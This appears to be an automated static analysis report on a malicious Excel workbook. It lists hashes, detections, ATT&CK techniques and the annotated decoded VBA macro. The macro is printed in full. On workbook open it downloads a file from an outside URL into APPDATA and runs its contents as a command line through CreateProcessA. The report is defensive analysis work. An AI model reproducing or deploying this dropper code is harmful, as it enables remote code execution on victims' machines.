Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 54fce640058356f0…

MALICIOUS

Office (OLE)

52.0 KB Created: 2018-10-09 07:18:04 Authoring application: Microsoft Excel First seen: 2021-01-11
MD5: c43446df960d9776d84e7b65d4c0c178 SHA-1: 0b8eabdc73da6eea3afdf06aa3660292f342febf SHA-256: 54fce640058356f035c786f869a86b0ebceaf9c510457de95fdf0a23afc44a7f
258 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel document containing VBA macros. A critical heuristic indicates the use of URLDownloadToFile within VBA, and the script itself contains API calls for CreateProcessA and URLDownloadToFile. This strongly suggests the macro's purpose is to download and execute a second-stage payload from the embedded URL http://kredytinksao.pl/raw.txt. In the extracted source, the downloaded file is written to %APPDATA%\pay1.ps1, read back from byte offset 10 into a 4096-byte buffer, and that buffer is passed as the command line to CreateProcessA — so the fetched file supplies the command to run rather than being executed directly as a script, and the file is left on disk (DeleteFileA is declared but never called).

Heuristics 8

  • ClamAV: Xls.Dropper.Agent-7592644-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7592644-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Ret3 = Environ$("APPDATA") + "\pay1.ps1"
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://kredytinksao.pl/raw.txt Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4347 bytes
SHA-256: 0a76635d9e9c190852b60a09ee16303ffa0f9e73d53eafe1772387962048cd0e
Preview script
First 1,000 lines of the extracted script
' olevba-decoded module headers. Two modules were extracted back to back:
' "Ten_skoroszyt" (presumably the workbook-level module, Polish for
' "This workbook") and "Arkusz1" (a worksheet module). The VB_Base GUIDs
' identify the host object class each module is attached to.
Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Second module; all code that follows (types, Declares, Workbook_Open)
' sits under this header in the extracted dump.
Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'asdf
' VBA mirror of the Win32 STARTUPINFO structure, passed ByRef to
' CreateProcessA below. Pointer and handle members are declared As Long
' even though the Declares use PtrSafe; this layout only matches 32-bit
' Office — presumably the sample targets 32-bit hosts (not confirmed here).
Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type
'asdf
' Receives the process/thread handles and IDs from CreateProcessA.
' Workbook_Open never reads or closes these handles after the call.
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type
'asdf
' Passed to CreateFileA; only nLength is set by the caller (sa.nLength = Len(sa)),
' the descriptor pointer and inherit flag are left at their zero defaults.
Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type
'asdf
'aa
'll
' Passed to ReadFile; the caller only zeroes hEvent (ov.hEvent = &H0),
' the remaining members keep their default zero values.
Private Type OVERLAPPED
        Internal As Long
        InternalHigh As Long
        offset As Long
        OffsetHigh As Long
        hEvent As Long
End Type
'lkl
'jkjkj
' Declared but never called anywhere in the extracted source: the
' downloaded %APPDATA%\pay1.ps1 is therefore left on disk after execution,
' which is a useful on-host artifact for triage.
Private Declare PtrSafe Function DeleteFileA Lib "kernel32.dll" _
(ByVal lpFileName As String) As Long

' Win32 process creation (flagged SC_STR_CREATEPROCESS). Called once from
' Workbook_Open with the 4096-byte buffer read from the downloaded file as
' lpCommandLine. lpProcessAttributes/lpThreadAttributes/lpEnvironment are
' declared As Long and passed as ByVal 0& at the call site.
Private Declare PtrSafe Function CreateProcessA Lib "kernel32.dll" _
    (ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, _
    ByVal lpProcessAttributes As Long, _
    ByVal lpThreadAttributes As Long, _
    ByVal bInheritHandles As Boolean, _
    ByVal dwCreationFlags As Long, _
    ByVal lpEnvironment As Long, _
    ByVal lpCurrentDirectory As String, _
    ByRef lpStartupInfo As STARTUPINFO, _
    ByRef lpProcessInformation As PROCESS_INFORMATION) As Long

' urlmon download-to-disk import (flagged OLE_VBA_DOWNLOAD / SC_STR_URLDOWNLOAD).
' The single call site fetches http://kredytinksao.pl/raw.txt into
' %APPDATA%\pay1.ps1; the return value is not checked by the caller.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As Long, _
    ByVal szUrl As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
' Used to reopen the downloaded file for reading. The call site passes the
' literal values 1, 2 and 3 rather than the GENERIC_READ / OPEN_EXISTING /
' FILE_ATTRIBUTE_NORMAL constants declared further down.
Private Declare PtrSafe Function CreateFileA Lib "kernel32" _
    (ByVal lpFileName As String, _
    ByVal dwDesiredAccess As Long, _
    ByVal dwShareMode As Long, _
    lpSecurityAttributes As SECURITY_ATTRIBUTES, _
    ByVal dwCreationDisposition As Long, _
    ByVal dwFlagsAndAttributes As Long, _
    ByVal hTemplateFile As Long) As Long
'hhh
''
' Reads the downloaded file into a fixed-length String buffer (Ret9, 4096
' chars). lpBuffer is declared ByVal As String, so the String's character
' storage is written directly; lpNumberOfBytesRead and lpOverlapped are ByRef.
Private Declare PtrSafe Function ReadFile Lib "kernel32" _
    (ByVal hFile As Long, _
    ByVal lpBuffer As String, _
    ByVal nNumberOfBytesToRead As Long, _
    lpNumberOfBytesRead As Long, _
    lpOverlapped As OVERLAPPED) As Long
    
' Used once to move the read position to byte offset 10 of the downloaded
' file before ReadFile; the first 10 bytes of raw.txt are thus skipped.
Private Declare PtrSafe Function SetFilePointer Lib "kernel32" _
    (ByVal hFile As Long, _
    ByVal lDistanceToMove As Long, _
    ByVal lpDistanceToMoveHigh As Long, _
    ByVal dwMoveMethod As Long) As Long

' Closes the CreateFileA handle after the read. Note the handles returned in
' PROCESS_INFORMATION are never closed.
Private Declare PtrSafe Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long

' Win32 constants copied into the module but unused: the CreateFileA call
' in Workbook_Open passes literals (1, 2, 3, 0) instead. Only the literal 3
' coincides with one of these values (OPEN_EXISTING).
Private Const GENERIC_READ = &H80000000
Private Const OPEN_EXISTING = &H3&
Private Const FILE_ATTRIBUTE_NORMAL = &H80&

' Auto-run entry point (flagged OLE_VBA_WBOPEN): runs when the workbook is
' opened with macros enabled. Observed sequence, all from the lines below:
'   1. download http://kredytinksao.pl/raw.txt to %APPDATA%\pay1.ps1
'   2. reopen that file, seek to offset 10, read up to 4096 bytes into Ret9
'   3. pass Ret9 as the command line to CreateProcessA
' No return value is checked at any step, so each stage runs even if the
' previous one failed. There is no Option Explicit in the module.
' Detection/forensics: the file write under %APPDATA%, the outbound HTTP
' request from the Office host, and a child process spawned by the Office
' host with a command line taken from that file.
Sub Workbook_Open()
    Dim si As STARTUPINFO
    Dim pi As PROCESS_INFORMATION
    si.cb = Len(si)                    ' size field required by CreateProcessA
    Dim Ret As Long                    ' CreateProcessA return (unchecked)
    '
    Dim Ret2 As Long                   ' URLDownloadToFileA return (unchecked)
    Dim Ret3 As String                 ' local path of the downloaded file
    ' Ret4 and Ret8 are declared but never used.
    Dim Ret4 As Integer
    Dim Ret6 As Long                   ' bytes actually read by ReadFile (unchecked)
    '
    Dim Ret8 As Long
    Dim Ret7 As Long                   ' file handle from CreateFileA
    ' Fixed-length 4096-char buffer: ReadFile target, then CreateProcessA command line.
    Dim Ret9 As String * 4096
    Dim Ret10 As Long                  ' CloseHandle return (unchecked)
    Dim sa As SECURITY_ATTRIBUTES
    Dim ov As OVERLAPPED
    ov.hEvent = &H0
    ' Path built from the APPDATA environment variable (OLE_VBA_ENVIRON finding).
    Ret3 = Environ$("APPDATA") + "\pay1.ps1"
    ' Stage 1: fetch the hard-coded URL to disk.
    Ret2 = URLDownloadToFileA(0, "http://kredytinksao.pl/raw.txt", Ret3, 0, 0)
    sa.nLength = Len(sa)
    ' Stage 2: reopen the downloaded file. Literal arguments are used instead of
    ' the declared constants (3 equals OPEN_EXISTING; 1 and 2 are presumably a
    ' read access right and a share mode — not confirmed from this source).
    Ret7 = CreateFileA(Ret3, 1, 2, sa, 3, 0, 0)
    ' "Result" is never declared; with no Option Explicit it is an implicit Variant.
    ' Skip the first 10 bytes of the file before reading.
    Result = SetFilePointer(Ret7, 10, 0, 0)
    Result = ReadFile(Ret7, Ret9, 4096, Ret6, ov)
    Ret10 = CloseHandle(Ret7)
    ' Stage 3: the file contents (from offset 10) become the command line.
    ' lpApplicationName is null, handles are inheritable, dwCreationFlags = 32
    ' (&H20, presumably NORMAL_PRIORITY_CLASS — verify). pi handles are never closed.
    Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi)
End Sub